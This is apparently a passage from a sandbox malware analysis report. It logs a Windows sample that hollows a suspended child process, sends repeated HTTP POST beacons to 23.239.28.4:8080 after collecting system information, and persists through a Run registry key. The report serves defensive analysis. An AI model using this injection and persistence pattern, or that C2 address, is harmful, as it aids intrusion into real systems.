|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 |
Thread 0x7d8
18
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 202052 |
|
3 | |
| System | Get Time | type = Ticks, time = 203050 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", os_pid = 0x570, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Thread | Get Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x7d8 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", address = 0x400000, size = 114688 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", address = 0x7efde008, size = 4 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp", address = 0x7efdf010, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x7d8 |
|
1 | |
| Thread | Resume | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x7d8 |
|
1 | |
| System | Get Time | type = Ticks, time = 209259 |
|
1 | |
| System | Get Time | type = Ticks, time = 210039 |
|
3 |
Thread 0x620
54
77
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 203082 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", os_pid = 0xbec, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Thread | Get Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x620 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", address = 0x400000, size = 102400 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", address = 0x7efde008, size = 4 |
|
1 | |
| Memory | Write | process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp", address = 0x7efdf010, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x620 |
|
1 | |
| Thread | Resume | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, os_tid = 0x620 |
|
1 | |
| System | Get Time | type = Ticks, time = 203846 |
|
1 | |
| System | Get Time | type = Ticks, time = 203893 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 204907 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 205874 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 206872 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 207871 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 208869 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 209868 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 211053 |
|
3 | |
| System | Get Time | type = Ticks, time = 212052 |
|
3 | |
| System | Get Time | type = Ticks, time = 213050 |
|
3 | |
| System | Get Time | type = Ticks, time = 214048 |
|
3 |
Process #15: narrowexisting.exe
179
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x570 |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
11C
0x
B10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00847fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x01ddffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01de0000 | 0x020aefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x021affff | Private Memory | Readable, Writable |
|
|
|
- |
| atl.dll | 0x73e90000 | 0x73ea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pstorec.dll | 0x73eb0000 | 0x73ebcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x73ed0000 | 0x73f53fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | os_tid = 0x11c, address = 0x0 |
|
1 |
Threads
Thread 0x11c
179
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x73ed0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x73ed6be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 |
|
1 | |
